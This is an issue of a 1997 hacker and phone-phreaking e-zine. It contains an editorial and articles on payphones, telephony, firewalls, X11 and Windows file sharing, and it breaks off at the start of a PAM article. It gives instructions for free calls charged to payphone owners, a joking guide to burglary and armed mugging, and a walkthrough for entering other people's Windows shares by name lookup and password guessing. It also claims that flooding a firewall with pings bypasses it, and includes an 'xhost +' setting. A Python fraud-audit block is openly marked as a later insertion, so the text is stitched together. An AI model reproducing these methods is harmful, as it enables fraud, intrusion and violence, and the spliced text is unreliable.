╒══════════════════════════════════════════════════════════════════╕
│The Havoc Technical Journal - http://www.thtj.com -               │▒
└──────────────────────────────────────────────────────────────────┘▒
 ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
vol.2 no.4 issue 16 │ November 1st, 1997 │ A thtj communications Publication
─────────────────────────────────────────────────────────────────────────────

              ╒══════════════════════════════════════╕
             -│ the havoc technical journal issue 16 │-
              └──────────────────────────────────────┘

Departments - total: 5k
   5k Editorial..............................Scud-O       01

Phreaking - total: 16k
   3k COCOTS.................................shamr0ck     02
   7k Phreaking Techniques...................KungFuFox    03
   6k Basics of Telephony....................AlienPhreak  04

Hacking - total: 51k
   6k Basic Firewalls........................Onyx         05
   6k X?.....................................│ntertia     06
   3k Windows File Sharing Basics............Chameleon    07
  31k PAM - Pluggable Authentication Modules.Scud-O       08
   1k VPN's Demystified......................Meikon       09
   4k LiteSpan 2000..........................XiLiCoN      10

Code - total: 11k
   3k genericrack2.pas.......................The Messiah  11
   2k genericrack2.c.........................Shok         12
   2k word.c.................................memor        13
   4k rm.c trojan Fix........................Shok         14

More Departments - total: 56k
  18k Oddville, THTJ.........................Scud-O       15
  38k The News...............................KungFuFox    16
  ───
  Total: 145k

Temporary site until thtj.com moves its nameservers
-------> http://www.antionline.com/thtj/ <------
────────────────────────────────────────────────

              ╒══════════════════════════════════════╕
              │  The THTJ Distribution Mailing List  │
              │      NOW UP! ──────── !PU WON        │
              │      majordomo@terminus.orc.ca       │
              └──────────────────────────────────────┘
                         'subscribe thtj'
──────────────────────────────────────────────────────────────────────────────

              ╒══════════════════════════════════════╕
              │the havoc technical journal - contacts│
              └──────────────────────────────────────┘

- Editor in Chief: Scud-O, scud@thtj.com
- Executive Editor: KungFuFox, kungfufox@thtj.com
- Submissions Editor: Keystroke, submissions@thtj.com
- thtj email address: thtj@thtj.com
- thtj website: http://www.thtj.com/
- thtj mailing address: PO BOX 448 Sykesville, MD 21784

Send All Articles to: submissions@thtj.com
Submissions Info & Policy: http://www.thtj.com/submissions.html
Distribution Info: http://www.thtj.com/distro.html

To subscribe to The HAVOC Technical Journal, send mail to majordomo@terminus.orc.ca, with no subject, and the body reading 'subscribe thtj' without the quotes. Note that this majordomo is only for thtj distro. The open mailing list is coming soon.

Subscribe to thtj online: http://www.thtj.com/subscribe.html

The Havoc Technical Journal Vol. 2, No.4, November 1, 1997. A Havoc Bell Systems Publication. Contents Copyright (©) 1997 Havoc Bell Systems Publishing. All Rights Reserved. No part of this publication may be reproduced in whole or in part without the expressed written consent of The Editor in Chief for The Havoc Technical Journal.

The Havoc Technical Journal does in no way endorse the illicit use of computers, computer networks, and telecommunications networks, nor is it to be held liable for any adverse results of pursuing such activities.

The articles provided in this magazine are without any expressed or implied warranties. While every effort has been taken to ensure the accuracy of the information contained in this article, the authors, editors, and contributors of this zine assume no responsibility for errors, omissions, or for damages resulting from the use of the information contained herein.

For information about using articles published in THTJ, send mail to:

e-mail: thtj@thtj.com │ mail: THTJ PO Box 448 Sykesville, MD 21784

NOTICE: if you are a government official or employee reading this file, you MUST register with thtj. A registration permit will be mailed to you free of charge by using either of the mail addresses above. A Registration fee of $50 is required upon submission of the permit. This will entitle you to receive thtj via a private mailing list, or via snail mail on a 3.5 floppy disk.

═───────────────────────────────────────────────────────────═
01 of 16
Editorial: THTJ Needs You / Microsoft is Scared.
By Scud-O, Editor in Chief
scud@thtj.com

THTJ Needs You!
───────────────

Recently some of you out there have been saying what thtj needs to add to its format. You say, but you do not act. THTJ is not just made by the thtj staff, it is a zine made by the people, for the people. If you want to see something added to thtj, then work with us on it. Do it.

THTJ currently has a lot of material in it, but we have a serious shortage of phreaking articles that are submitted to us. While hacking is more popular than ever, and hacking material is easy to come by, phreaking material is not. THTJ is working to become a medium for phreaking information, but we can not do it without you. We urge you to help thtj and the underworld with phreaking materials.

THTJ also has a serious shortage of the following types of articles:

  o NT Articles
  o Phreaking
  o UNIX Code
  o Crypto
  o VAX/Other OSes

The thtj staff is currently working to get articles on these subjects, but we can not do it alone. Your submissions are critical. Your submissions are *very* important to us. You help make this zine run.

Why write for thtj? Simple, thtj is one of the largest zines out there covering hacking, phreaking, coding, crypto, etc. THTJ has received worldwide coverage, and every day thtj is reaching more people.
Your name will be on people's minds after thtj has included one of your articles. After 2 or more articles, you are eligible to be included on the thtj staff and receive some goodies from thtj.com, information before anyone else has it, meet the contacts and friends out there, and receive copies of thtj issues before anyone else does.

═────────────────────────────────────────═

Microsoft is Scared
───────────────────

This month sees the release of Internet Explorer 4.0, and about a million lawsuits that followed it. The Justice Department is cracking down on Microsoft again, and Sun Microsystems is suing Microsoft for its use of Java. However, all this should not be a surprise to anyone. Microsoft has always practiced aggressive and unethical trade practices. And they did all this for good reason with IE4. Microsoft is scared.

Why is the world's biggest company scared? They see the end of Microsoft, if they do not act right now. The WWW and the internet explosion took Microsoft by surprise. Look back 2 years ago, to the release of win95. The Microsoft Network was the big thing when win95 first hit the streets. MSN was very similar to AOL, everything was a new interface. Well, MS dismissed the WWW as a temporary fad. Well, this blew up in MS's face. They quickly released Internet Explorer 1.0 and 2.0, which were pathetic when compared to Netscape. Even in version 2.0 however, MS was making MS-only html tags, and trying to get control of the HTML standard. With the new IE 4.0, MS is only expanding this control. MS is trying to take over the internet's most popular tool, the www.

MS is also modding Java for obvious reasons. Java is a *huge* threat to MS. Java means that programs are not only platform independent, they are *OS* independent. MS has the control of the OS market, and they do not want to lose this. They bought out Web TV for the same reason. Web TV & Java == No need for a computer == No need for Microsoft.
However, if Microsoft gains control of Java and Web TV, they can make these work for them, and they can gain even more of the population.

Microsoft will tell you that they are the innocent big boy that everyone picks on, but this is pure bullshit. MS has always, and will always practice 'aggressive marketing methods'. Example: making IE be included with Win95 or, computer companies do not get Win95 for their machines. Example: MSN is on the desktop in Win95, Standard. The list goes on. MS is nowhere near innocent, they are guilty as sin. Do not feel sorry for them. Hell, do not feel sorry for any multi-billion dollar company.

How can we stop MS from taking over the world? By mailing the President. The Vice-President. Your Congressperson. Your Senator. The Press. Anyone! This terror *must* stop, otherwise we will not have a choice on 'Where we want to go today'.

Scud-O, Founder, and Editor in Chief of THTJ

═────────────────────────────────────────═

Scud-O and HBS would like to hear your views on this issue. Please feel free to e-mail us at: scud@thtj.com

-of HAVOC Bell Systems-
scud@thtj.com │ http://www.thtj.com

═───────────────────────────────────────────────────────────═
02 of 16
COCOTS
By shamr0ck, Special to thtj
shamr0ck@juno.com

Introduction..

Today I'm going to show you some fun stuff you can do with COCOTs (Customer-Owned Coin-Operated Telephones). COCOTs are payphones owned by individuals and private companies. COCOT payphones have been around for many years. The reason COCOTs are really hitting the market is because of the money. COCOT owners get to keep about 85% of the profits, the rest goes for taxes, and trust me that's A LOT. By 1991, there were more than 30,000 COCOTs in New York State alone. Just think of how many are in the rest of the country. Yes, it's a very big industry.
Some COCOTs out there are served by AOS (Alternate Operator Service) companies, such as US Sprint, AT&T and MCI, but they only serve them. Most COCOTs don't have their logo on them, although I have seen them on some. ALL COCOTs are required to provide a caller with access to the local exchange telephone company offering service within the area in which the call originates. Callers should be able to reach the long distance company of their choice by dialing 10xxx for AT&T, MCI, etc.

Things to do with a COCOT

You have to know what you're looking for. COCOT payphones do not have any big name phone company logos on them. You can usually find them in big hotels, inside and outside of restaurants, and a bunch of other places.

So you have found a COCOT. "Now what the fuck do I do with it?"

You get on the phone and dial an 800 number and you tell them to fuck off. Then they hang up on you (don't call a telco 800 number or some fed office, dumbass). For about five secs you will hear a modem type sound. Yeah, that's the 1200bps modem inside the COCOT. After you hear that you should hear a dial tone. Now you can dial out without paying a cent. On some COCOTs you have to dial using a radio shack tone dialer ($25) because they disable the keypad when there's no money in the coffer.

"So I did that but it still doesn't want to work. What do I do now?"

Well, if you tried dialing out using both the keypad and the tone dialer you are out of luck. I have seen the new COCOTs around, and they really suck. You can't dial out because they deaden the handset. Never give up though, there are still a lot of old COCOTs around.

"Ok, I made a lot of calls using a COCOT. Who pays for it?"

The owner of the pay phone does.. if you really like that COCOT you shouldn't think you are 0-day (do not abuse the fraking cocot). If you abuse it you will:

1. Get caught.. they do get a phone bill and they do get the numbers you called on the bill.. they are on the ESS.
2. The payphone will get taken away (make calls to france from N.Y. and talk for 10 hours a day; I think you know what I'm getting at)
3. Your mom will catch you and slap you around a bit with a large trout..

Good luck.

-shamr0ck
shamr0ck@juno.com

═───────────────────────────────────────────────────────────═

Subscribe to The HAVOC Technical Journal

Subscribe today and get the special rate of FREE! It's like getting 12 issues a year for free!

── send mail to: majordomo@terminus.orc.ca, with no subject and the body of the message reading 'subscribe thtj' without the quotes.
── or sign up online: http://www.thtj.com/subscribe.html

═───────────────────────────────────────────────────────────═
03 of 16
Phreaking Techniques
By KungFuFox, Executive Editor
kungfufox@thtj.com

Welcome to the wonderful world of phones! Do you wanna make phonecalls for free?! Do you wanna have lotsa fun at the expense of somebody else?! Do you wanna have a beigebox or a redbox, but don't even know what they are?! Read on k-rad kiddies!

Let's start off with some basics, the kinda info you need to become a real phreak like the big boys! You gotta learn how to get free phonecalls! Let's start off with a pretty simple way, with a beigebox! I know you don't know what that is, it doesn't matter, I'll tell you how it works! Basically you get a phone, and you plug it into somebody else's house instead of yours! Don't have a phone? No problem! My poor man's beigebox works just as well, and all you need to use it is a rock! Either one from your home or from the location of your victim is fine.

Get to the victim's place, preferably at night, and find a window to a room you think has a good chance of having a phone in it, and chuck the rock at the window. Make sure you're not standing right next to the window when you do this, because it's liable to break, granted you don't have two broken arms to throw rocks with.
If you can find a neighborhood filled with deaf people, or a slum where people hear windows breaking regularly, this phreaking technique is much more likely to work.

Ok, now that the window is sufficiently removed, you need to get in there. Hopefully you picked a window that wasn't 10 feet off the ground. Climb on in there, making sure you don't peel the skin off your body, and look for a phone. Though you may be tempted, it isn't a good idea to turn on the lights when you start looking for that phone, obviously because turning on the lights is a lot more suspicious than breaking a window.

Now for the complicated part. Once you've located the phone, you have to use a special technique to use it, because ma bell designed phones so you can't beige box with them at normal phone jacks. Rip the phone out of the wall, so that the plug on the end of the wire becomes separated from the wire. Bite off the plastic cover on the wire, and you'll see 2 or 4 wires inside it. You'll be dealing with the red and green wires. Strip away a couple inches of that colored insulation from those two wires. Now your beigebox is prepared for use.

The only thing left to do is find a place to beige from. If this building you used your geological key to get into has a basement, you'll probably wanna go down there and look around for a plastic box mounted on a wall. It'll probably have a phone company insignia on it, most likely a generic bell shaped symbol, and a name with the word "bell" in it. Other possible names are "uswest", "ameritech", and "nynex". If this plastic box thing isn't in the basement, look around outside for it. It'll be on an outside wall somewhere around the building. Once you find it, bash it good with your beigebox until it breaks open. You can use your feet and hands if you like. You could even use the rock you removed that window with if you can find it. Just make sure you bash the cover off that plastic box.
Hopefully after all this work you'll be greeted with some screws in some strange geometric pattern. Hold the beigebox's handset up to your ear so you can hear it if it gets a dialtone, and start touching the red and green beigebox wires to different screws. After a few minutes if you don't have a dialtone, you're either retarded or the phoneline is disconnected. In the latter case, you'll need to go to another building, find another plastic box with a phone company insignia on it, and try the same procedure there. If you're just retarded, bash yourself in the head with the beigebox. It's probably angry at you anyway, for ripping it out of the wall.

Another good way to make free phonecalls, and become an elite phreak, is to redbox. Don't know what a redbox is either? No sweat! I'll tell you how to get free calls just like a redbox does, but without the time consuming construction! First things first, you need to find a payphone. Any payphone will do, so long as it works. Don't believe any of the undercover telco people on irc that may tell you redboxes don't work. They do! Once you've found yourself a payphone, you need to get money to use it. Ha! I didn't mean your own money! That wouldn't be free!

My first technique is something I'll call begging. To beg successfully, you'll need to look shabby. Don't shave if you're old enough that shaving matters, and don't comb your hair or whatever it is you normally do to it. Also, your worst clothes, slept in the night before your first redboxing day, is a good idea. Bring along a disposable cup, you can find one on the way if you need to, and go to that payphone. Now, when people walk by it, or walk up to use it, they're probably gonna have some change. Just sit there looking real pathetic and people are bound to start dropping as few coins as they can into your cup. Don't worry, even though they're cheapasses, eventually those small donations to your personal charity will add up.
Once you've got like five bucks, you can start making calls, and they won't have cost you any money at all!

My second technique, which is a much more effective method of obtaining funds, is something I like to call mugging. This will take some patience though, for you need to find the weakest person possible before attacking. Preferably you should find somebody who weighs a lot less than you do. Once you've found your anonymous donor, you may either knock them down, or simply grab them. Weapons such as guns and knives are excellent when implemented properly, to terrify your victim into submitting to your demands for money. Once you've acquired the funds that you feel are necessary to support your need to make free phonecalls, and become a better phreak, you may let them go, and get yourself to a phone, to start using that money.

Ok now that you've acquired a couple tricks of the trade, get your lazy ass out there and phreak!

═───────────────────────────────────────────────────────────═
04 of 16
Basics of Telephony
By AlienPhreak

Surprisingly enough most phreakers don't even know the real basics of the telephone system. This article will outline the following features:

  POTS
  Trunks
  The Switching System
  PBXs (PABXs)

The Plain Old Telephone System (POTS):

The main part of the POTS is the actual telephone. The telephone requests network access by using a signalling method called loop start. When the telephone starts its session it's called "off hook" voltage, indicating the voltage being sent from the switch or CO through the 2-wire connection (red and green wires). Of course when you don't pick up the receiver the phone is on hook. When the telephone receives a call the network (switch) gives ring voltage out to the telephone (90 VAC over the DC voltage). Then you get those happy rings and you pick up the phone.

For the phone to dial out you need a type of signaling. Before Dual Tone Multi-Frequency (DTMF), there was good ol' rotary or pulse dialing.
DTMF is pretty much the standard these days on most switching systems. Pulse dialing is still used in some areas. Another signaling method is MF or Multi-Frequency. Like DTMF, MF is used on a few types of trunks and CCITT signaling. If you know anything about the old Blue Boxes, they used the KP, ST, R1-R2 signals, et cetera, which are actually MF signaling.

Now the tricky part is converting speech into electrical signals. For the switching system to change your voice into signals, it uses Transmit Loudness Objective Rating (TLOR). For you to receive the signals the switch then sends out Receive Loudness Objective Rating (RLOR).

Central Office (CO):

In many phreaking articles you will see the acronym CO, which of course stands for Central Office. The CO is pretty much the center of all the local phone networks. It connects you to the rest of the world and all the other switches. The CO is a physical facility where all of the networking and routing switches are physically held. The trunks are what call the other trunks within other COs (where the trunk directs or "routes" your call depends on where you are calling to). There is no main purpose of the CO besides housing all of the computers, trunks, and line-cards associated with the local network.

The Switching System:

The first major independent switching system was Step-by-Step (SxS) switching. SxS was run by electro-mechanical switches. It is now a rather archaic system but is still used in some places. Dial pulses would be used to cause the switches to select switch groups until the full number was dialed.

Crossbar Switching (XB) was the next electro-mechanical switching system to come into play. The XB system was set up much differently than SxS. It used a matrix of connectors arranged in a grid to form its connection scheme.

ESS was the first non-mechanical switching system. It provided many more features than the basic calling system of SxS. ESS could handle both pulse dialing and DTMF signaling.
The main ESS, which used the 1A processor, was easily upgradable to 1ESS. The processor also controlled 4ESS, allowed it to be easily upgraded, and ran in real time.

5ESS is almost the "industry standard switch" of today, and is far superior to Nortel's DMS switches. The 5ESS is manufactured by AT&T and is used by almost every RBOC (Regional Bell Operating Company). The 5ESS's are almost entirely unix based, though it is very different from the unix systems you or I run. It has many more features and is set up by AT&T for their routing and channeling.

Private Branch Exchanges (PBXs):

The PBX is almost like a miniature switch. It controls a small area like a business or a school phone system. The point of a PBX system is for companies to use as few telephone lines as necessary to get the most out of their telecommunications budgets. If you have 100 people and 100 phones, the fact is not all 100 people are going to be using the fones at the same exact time. PBX systems provide switching of in-house calls, and "pool" the outside lines.

There are many functionalities of the PBX, such as paging systems and voice mail boxes (VMBs). There are many neat things a phreaker can do with a PBX. Some PBXs are set up so that someone can call in and they will get an automatic dial tone. After that they enter a code and the user is allowed to dial out, with the call being billed to the company that owns the PBX. Of course this can be abused, along with the VMB.

PBX networking can be very complex. I will only cover one type of Switched Services Network (SSN). An Electronic Tandem Network happens to be what my private school phone system uses. It's set up in the manner that all lines (extensions) have a three digit address. Automatic routing can take place within the private network. This SSN is set up on a privately owned trunk so that the company or school can set it up however they would like.

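The dial-in, enter-a-code, dial-out PBX feature described above leaves a trail in the PBX's call records, which is where the owner who gets the bill can spot abuse. The following Python audit is an added example, not part of the original article; the record layout, thresholds and phone numbers are constructed assumptions.

```python
import csv
import io
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed call detail records (CDRs); real PBXs export different fields.
# entry: "extension" = in-house phone, "remote_access" = outside caller who
# dialed in and was offered dial tone plus an authorization-code prompt.
SAMPLE_CDR = """\
start,caller,entry,auth,dialed,seconds
1997-10-27T09:14:00,4105550101,extension,ok,4105550144,180
1997-10-27T14:02:00,4105550133,remote_access,ok,4105550190,240
1997-10-28T02:11:00,2125550177,remote_access,fail,,5
1997-10-28T02:11:40,2125550177,remote_access,fail,,5
1997-10-28T02:12:15,2125550177,remote_access,fail,,6
1997-10-28T02:13:05,2125550177,remote_access,ok,01133155501234,36000
1997-10-28T23:40:00,3015550122,remote_access,ok,3015550199,90
"""

# Assumed policy values; tune them to the site.
BUSINESS_HOURS = range(8, 18)        # 08:00-17:59 local time, Mon-Fri
FAIL_WINDOW = timedelta(minutes=10)  # window in which bad codes are counted
FAIL_THRESHOLD = 3                   # bad codes that count as guessing
MAX_SECONDS = 2 * 60 * 60            # longest dial-out considered normal
INTL_PREFIX = "011"                  # North American international prefix


def parse(cdr_text):
    """Return CDR rows sorted by start time, with typed start/seconds."""
    rows = []
    for row in csv.DictReader(io.StringIO(cdr_text)):
        row["start"] = datetime.fromisoformat(row["start"])
        row["seconds"] = int(row["seconds"])
        rows.append(row)
    return sorted(rows, key=lambda r: r["start"])


def audit(cdr_text):
    """Return (start, caller, reasons) for suspicious remote-access calls."""
    recent_fails = defaultdict(deque)  # caller -> times of recent bad codes
    findings = []
    for row in parse(cdr_text):
        if row["entry"] != "remote_access":
            continue  # in-house extensions never pass the code prompt
        fails = recent_fails[row["caller"]]
        while fails and row["start"] - fails[0] > FAIL_WINDOW:
            fails.popleft()  # forget bad codes older than the window
        if row["auth"] == "fail":
            fails.append(row["start"])
            if len(fails) == FAIL_THRESHOLD:  # alert once per burst
                findings.append((row["start"], row["caller"], ["code-guessing"]))
            continue
        reasons = []
        if len(fails) >= FAIL_THRESHOLD:
            reasons.append("success-after-guessing")
        if row["start"].hour not in BUSINESS_HOURS or row["start"].weekday() >= 5:
            reasons.append("after-hours")
        if row["dialed"].startswith(INTL_PREFIX):
            reasons.append("international")
        if row["seconds"] > MAX_SECONDS:
            reasons.append("long-call")
        if reasons:
            findings.append((row["start"], row["caller"], reasons))
    return findings


if __name__ == "__main__":
    for start, caller, reasons in audit(SAMPLE_CDR):
        print(start.isoformat(), caller, ",".join(reasons))
```
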
Trunk Signaling:

Due to time constraints I can only talk about one type of trunk signaling, the Single Frequency (SF). SF signaling is used on all 4 wire analog systems. SF is a type of 'inband' signaling scheme where all information is transmitted in the voice band. SF uses 2600hz and 2280hz signals to transmit data. When the trunk is in an on-hook state the 2600hz or 2280hz tone is used to connect to the remote site. When the trunk is in an off-hook state the 2600hz or 2280hz tone is dropped. SF units can pass dial pulse address signaling at speeds from 8 to 12 pulses per second (PPS) with 56 to 69 percent break.

*2280hz is only used in British Telecom's trunks.

This concludes my article on the basics of the telefone system. If you see anything wrong with this article or just want to comment on it please email me at alienphreak@linenoise.org.

═───────────────────────────────────────────────────────────═
05 of 16
Basic Firewalls
by Onyx

Part 1

I am writing this article to basically confirm and dispel ideas about firewalls. The first section is for people who just want the gist of what a firewall is; the second section is more technical.

Most people, especially hackers, consider firewalls a very big threat and make them to be something they are not. First let's define one in the simplest terms. A firewall is a computer sitting between your network and the Internet that runs special software to keep people out. That's it in the simplest terms. Firewalls can be configured in several ways and don't have to be on a separate computer that only runs the firewall's software. Lots of times a so-called "poor man's firewall" can be configured by using a computer that is also used for other applications.
Most of the time a firewall setup looks something like this (forgive the crude drawing):

    Network-------Web Server----Firewall>----Internet

        or

    Network-------Firewall>-----Webserver----Internet

In the first example everything is behind the firewall, thus theoretically your network and web server are behind the firewall. In the second example your web server is vulnerable to attack, but even if you manage to breach the web server's security to get to the Network you still need to get past the firewall. The second configuration I consider more safe, although others will argue differently (it is sometimes referred to as the "sacrificial lamb" configuration because you are "sacrificing" your web server).

Getting back to what a firewall does. A firewall is designed to block access to certain things. Most of the time this is based on domain, which leads to one insecurity which I will get to later. As an example let's use the site secure.com. Say secure.com decides to set up a firewall that denies access to port 23 (telnet) to everyone except those who are a part of a certain domain. Now most of the time companies are too cheap and don't want to pay for expensive firewalls. So to get access the easiest way is to ping the firewall so it gets too lagged to check who you are and just drops to the desired service. This ONLY works for cheap firewalls.

Some sites who know nothing of computer security and assume someone trying to break into their site knows virtually nothing also (idiots) have tried to set up stupid "fake" firewalls. I ran into a site, which will remain anonymous, that, to deter hacking attempts, said on the login screen that this was something something firewall blah blah blah. Well anyway it wasn't a firewall and they were just trying to scare people into thinking it was so hackers would leave their site alone... didn't work for me =)

So trying not to get too technical here, a firewall that checks access to a service through domains can be spoofed.
If you would like to know about spoofing there are plenty of articles out there for you to read.

Section 2

People who are interested in more technical details read on:

This will be a more in-depth description of a firewall. People throw the word firewall around a lot and don't know exactly what constitutes one and what kinds there are. Most firewalls are screening routers. They provide packet filtering and work with the lower level of the network protocol stack. Another type is known as a proxy server gateway (I know it sounds imposing). They perform basic proxy services for external networks for internal users. These actually look at the data INSIDE packets. And finally the third type uses what is known as a stateful inspection technique. Firewalls are most often built on top of routers, and routers in turn are used with gateways offering high-end protection.

Here is another crappy diagram which depicts a screening router, NOT a proxy server!

                        |
    Internet----------->|----------
                        |
           <------------|----------User      |=Screening Router
                        |

A proxy server looks SIMILAR, but not EXACTLY the same. Instead of just some simple uncomplicated software, proxy servers are actual computer(s) that run ONLY special proxy software.

Another thing I would like to point out about firewalls is that they are basically a newly *implemented* technology. The technology, however, has been around for a while, since the implementation of the TCP/IP protocol. All that was required to develop them was some smart thinking. One of the recent developments was allowing video and audio conferences through firewalls. Before, to allow this, people had to set up the firewall so that it didn't utilize its full potential for protection.

When a person decides that they want a firewall they have to decide what services they want to offer. I know this will sound stupid, but you CAN set up finger to work through a firewall.
Now I don't know exactly why you would want this except if you wanted your users and every other person on the net to know who is currently logged onto your network. Some of the services you can use through a firewall are:

  Telnet
  FTP
  HTTP
  Finger (sigh)
  Gopher-Archie

There is one more. X. Now I know those of you who are familiar with X security will be plotting in your evil little minds now (hehehe). Well anyway if you aren't familiar with X, what you should at the very least know is that it is very insecure. One of the major problems with it is that users can monitor your keystrokes. In some instances you can, over a telnet proxy, start a virtual X server.

═───────────────────────────────────────────────────────────═
06 of 16
X?
By │ntertia, Special to thtj
inertia@webzone.net

In general, when one thinks of an operating system that has a graphical user interface, one thinks Microsoft Windows, not the X Window System. This person is missing out. Here, I will attempt to explain X and its counterparts, such as the XFree86 Project... along with many examples of why X is better than everything else. My technical experience is limited to Linux, so XFree86 and how to successfully implement it on your OS will be the bulk of this article.

So what exactly is "XFree86?" XFree86 is the focus of the XFree86 project, developed to provide a GUI for Linux, OpenBSD, and OS/2, among many others. X along with a good window manager (a window manager provides the GUI and sets the level of configuration for your environment, along with providing you a means of control) makes Windows 95 look like total crap. X has yet to reach the level of user-friendliness that Windows has, but hell, we're talking about Linux here, not DOS. When you get familiar with X then that Win95 partition is outta here. ;]

Enough background and opinions, let's take it to another level, shall we? So now that you know about X... it's time to pay attention to where it lies in your HDD.
(From now on we're talkin Linux only, X11R6, the current version.) X is drawn from /usr/X11R6; to make it simple, this is where X and all of its accessories, games, etc. are located. This makes X easily accessible, since it's not thrown into other directories, e.g. /usr/X11R6/bin instead of /bin. Now that the general location has been determined, you might wonder which files are important or which files do what on your system. Keep reading.

X, like anything else, has proprietary commands that cannot be successfully executed without an X display open. If you are new to Linux, at the shell prompt type startx to begin an X session, or if you prefer an X login prompt to skip over multiuser mode completely then edit the initial runlevel to 5 in /etc/inittab. To change video card settings etc, run the command Xconfigurator in a shell or in X itself. Sorry if the instructions are vague, but the intention of this is not to show you how to run X, but to explain in an understandable manner the unique attributes and advantages of the system and provide general information on how to better understand how it works.

You cannot, of course, open Netscape while inside a shell... you can inside of an Xterm in X (an Xterm is simply a shell emulator that is run through X) but otherwise it is impossible. Naturally, these proprietary commands are all GUI programs, but many are very powerful. Now is the time that I could go into the people who say they hate Windows because it's the cool thing to say, haha, but I at least have valid reasons for picking X over Windows any day. Don't be stupid and think that just because you are provided a GUI, the program is weak, because, well, you would be wrong. For example, there is an XFree86 driven kernel hacker, Xconfig. If you run X, next time you recompile your kernel type make xconfig instead of make config.

The organization of the XFree86 system and its identifying commands have been mentioned; now we will look at how it comes together.
Upon startup, the .xinitrc file is read. Here is my .xinitrc:

    #!/bin/sh
    # Turbo Linux XINITRC by Scott Stone (sstone@turbolinux.com)

    userresources=$HOME/.Xresources
    usermodmap=$HOME/.Xmodmap
    sysresources=/usr/X11R6/lib/X11/xinit/.Xresources
    sysmodmap=/usr/X11R6/lib/X11/xinit/.Xmodmap

    # merge in defaults and keymaps
    if [ -f $sysresources ]; then
        xrdb -merge $sysresources
    fi

    if [ -f $sysmodmap ]; then
        xmodmap $sysmodmap
    fi

    if [ -f $userresources ]; then
        xrdb -merge $userresources
    fi

    if [ -f $usermodmap ]; then
        xmodmap $usermodmap
    fi

    #
    # Programs & Window Managers
    #
    #xsetroot -solid gray7 &
    #xterm -T 'Login Shell' -ls &
    #xbiff -update 5 -geometry +5-5 &

    # Uncomment this line if you want other machines to be able
    # to open windows on your machine (by default):
    # Note: 'xhost +' switches off host-based access control, so any
    # host that can reach the X server can connect to this display.
    xhost +

    # Start up a window manager - only one of these lines should be
    # un-commented.
    afterstep
    #fvwm
    #fvwm95-2
    EOF

The file in itself keeps things nice and simple... as you can see, it sets the paths to a couple of other initialization files, reads them (.Xmodmap and .Xresources), provides you with an option to let others access X on your computer, and then looks for a window manager to start up with. Along with these initial functions, the window managers have their own initialization files to be read. To go into that would be overkill at this point.

The system has been configured and is all ready to start up... but what happens when it is not successfully run? Next we will go into common, even frequent, errors that you will most likely face at some point in time. One of the simplest problems to overcome is an improper video card or color/resolution specification. This can be fixed by running Xconfigurator or simply passing arguments to the command line, such as startx -- -bpp 24, which will start X in 24 bit color mode; replace 24 with 8, 16, etc. to meet your own needs. Invalid settings have, personally, caused 90% of the problems that I have with X.
A common error message for this is "server is already running, blah blah blah." Another error is "unable to access security policy etc." That, I have heard, is a bogus message in some versions of X11R6, and can be fixed most easily through re-installation, if you can call that easy maintenance.

In conclusion, X is a durable and, surprisingly enough, easy to use system. The level of control you have over it is amazing to the typical Windows user, and is well worth the time to check out. I would like to go into higher detail, but I don't really have the time to write such a large document at once that would include color tables, a little source, and a VERY cool feature, hosting X applications to a remote user. If you have any suggestions for a good continuation to this article feel free to email me.

Peace...
inertia@webzone.net

------------------------------------------------------------
07 of 16

Windows File Sharing Basics
By Chameleon, Special to thtj
Chameleon@intercore.com.ar

Now to you NT gurus this is all very basic, but since most of you are unix hackers you probably don't know shit about Windows. It is a must to start learning Windows now. NT is getting big. More and more each day people are starting to use it. Yes, I agree, I hate NT and love a good ol' unix box, but we must keep up with technology. NT is widely used even by places like the Pentagon. (*cough* it was easy to hack *cough*)

Ok class, let's start...

Say you have an IP address that you want to try and get access to. You would do this:

Example for IP address: 194.8.235.73

Note: Use IP addresses, because the name address sometimes won't work and the IP will, so use IP addresses.
Drop to DOS:

    c:\windows> nbtstat -A 194.8.235.73

           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    MAILGATE       <00>  UNIQUE      Registered
    MAILGATE       <03>  UNIQUE      Registered
    MAILGATE       <1F>  UNIQUE      Registered
    MAILGATE       <20>  UNIQUE      Registered
    ..__MSBROWSE__.<01>  GROUP       Registered
    MIRAGE         <00>  GROUP       Registered
    MIRAGE         <1D>  UNIQUE      Registered
    MIRAGE         <1E>  GROUP       Registered

    MAC Address = 00-00-00-00-00-00

    ----------------------------------------------------------------------------
    | Note: this will list the remote host's name. The name is set in the      |
    | control panel/networking/identification/computername.                    |
    ----------------------------------------------------------------------------

Now that you have the computer name you need to tell Windows the IP that maps to that computer name. To do this you need to edit c:\windows\lmhosts; open it in notepad or whatever. It will look like this...

    127.0.0.1       localhost

You want to add the IP 194.8.235.73, then press tab and enter the computer name, so the new hosts file will look like this:

    127.0.0.1       localhost
    194.8.235.73    MAILGATE

This sets up a computer name mapping to the IP address of the computer to try and get into its file sharing. Save this and then click your Start button, then go to Find, then Computer, then enter the computer name, and it will connect to the computer name that you added into the hosts file. It should show the computer as being found. Double click it, and then if you're lucky it won't have a password, but if you aren't you will be prompted for a password, which you will have to try and guess or use a brute force cracking program.

Hope this was a little help. If not, at least you know how to use Windows file sharing...

Anyone good at coding in Windows? Wanna code a brute force hacking program for Windows file sharing? E-Mail me.

Laterz
Chameleon
Chameleon@intercore.com.ar
InterCore Security Corp.
http://chameleon.core.com.ar
http://www.intercore.com.ar
irc.intercore.com.ar

------------------------------------------------------------
Write for THTJ.
------------------------------------------------------------
08 of 16

PAM - Pluggable Authentication Modules
By Scud-O, Editor in Chief
scud@thtj.com

+------------------------------+
| PAM                          |
+------------------------------+

    I.    Introduction
    II.   Modules
    III.  Services
    IV.   Configuration Files
    V.    Shadow Passwords
    VI.   How It Works
    VII.  The PAM API
    VIII. Sample PAM Application
    IX.   References

+------------------------------+
| I. Introduction              |
+------------------------------+

Computers are insecure things. You and I both know that. And in 1969 so did the fine people at Bell Labs, who coded UNIX. Thus, UNIX needs to be able to authenticate you before it can let you proceed. When you log into any system, you enter a user name and password. These two things are used to see if you are who you say you are. However, these are not the only ways that you can be authenticated, and passwords can be stored in other ways than just the good old /etc/passwd file.

Before PAM, if you were to adopt a system of authentication, you would have to recompile every single one of your programs to support the authentication. Hence, many sysadmins did not use alternate methods of authentication, and that is why it is so easy for you and I to get into systems.

